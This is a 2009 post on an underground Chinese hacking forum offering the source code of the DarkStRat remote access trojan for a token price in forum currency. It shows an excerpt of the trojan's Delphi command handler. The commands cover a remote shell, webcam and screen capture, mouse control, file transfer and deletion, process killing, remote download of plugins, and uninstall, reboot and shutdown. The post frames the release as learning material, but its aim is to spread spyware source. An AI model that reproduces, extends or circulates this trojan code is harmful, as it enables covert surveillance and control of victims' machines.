|
管理员

- 威望
- 11 点
- 暗币
- 7380 AB
- 注册时间
- 2006-5-20
- 最后登录
- 2010-7-30
|
1#
大 中
小 发表于 2009-3-17 21:28 只看该作者
  
DarkStRat 2008 1.5 开源版(1AB了)
引用:1.5版本开源,希望大家抱着学习去心态去看,毕竟这次开源的完整源码不会缺功能。1.x系列源码基本一样只是有细微bug修复,和2.x规范方面差了很多。但这份代码很适合初学者学习!
http://www.darkst.com
暗组技术论坛 New4[D.S.T]
2009.03.17 引用: if Recibido = 'PING' then //ping功能
if Copy(Recibido, 1, 8) = 'MAININFO' then //上线标志
if Recibido = 'INFO' then //系统信息
if Copy(Recibido, 1, 8) = 'SERVIDOR' then //服务端信息
if TempStr = 'CERRAR' then //断开连接
if TempStr = 'DESINSTALAR' then //卸载服务端
if TempStr = 'REBOOT' then //重启
if TempStr = 'POWEROFF' then //关机
if Recibido='PROC' then //进程列表
if Copy(Recibido, 1,8) = 'KILLPROC' then //结束进程
if Copy(Recibido, 1,7) = 'WINPROC' then
if Recibido = 'VERUNIDADES' then //查看磁盘
if Copy(Recibido, 1, 14) = 'LISTARARCHIVOS' then //查看目录
if Copy(Recibido, 1, 4) = 'EXEC' then //远程打开
if Copy(Recibido, 1, 6) = 'OCULTO' then //隐藏方式
if Copy(Recibido, 1, 7) = 'DELFILE' then //删除文件
if Copy(Recibido, 1, 9) = 'DELFOLDER' then //删除文件夹
if Copy(Recibido, 1, 6) = 'RENAME' then //重新命名
if Copy(Recibido, 1, 5) = 'MKDIR' then //新建目录
if Copy(recibido, 1, 7) = 'OPENURL' then //打开网址
if Copy(recibido, 1, 7) = 'DllMAIN' then //插件管理模块
if Copy(recibido, 1, 1) = '1' then //启用
if Copy(recibido, 1, 1) = '2' then //停用并删除
if Copy(recibido, 1, 1) = '3' then //下载插件
if Copy(recibido, 1, 1) = '4' then //信息
if Copy(Recibido, 1, 12) = 'HTTPDOWNLOAD' then //Http下载操作
if copy(Recibido,1,6) = 'MOUSEP' then //屏幕监视-鼠标控制
if Copy(Recibido, 1, 9) = 'CAPSCREEN' then //屏幕查看
if Copy(recibido,1,8) = 'CAMBIOID' then //修改备注信息
if Copy(recibido,1,13) = 'LISTARWEBCAMS' then //视频
if Copy(recibido,1,13) = 'CAPTURA WEBCAM' then //抓取视频
if Pos('GETFILE|', Recibido) = 1 then //接收文件
if Pos('RESUMETRANSFER|', Recibido) = 1 then //传输文件
if Pos('SENDFILE|', Recibido) = 1 then //发送文件
if Pos('SHELL|', Recibido) = 1 then //超级终端 远程Shell 论坛内部既然还有人免费发,我现在就象征性收1AB下载留个名。
附件: 您所在的用户组无法下载或查看附件
搜索更多相关主题的帖子:
DarkStRat 开源
|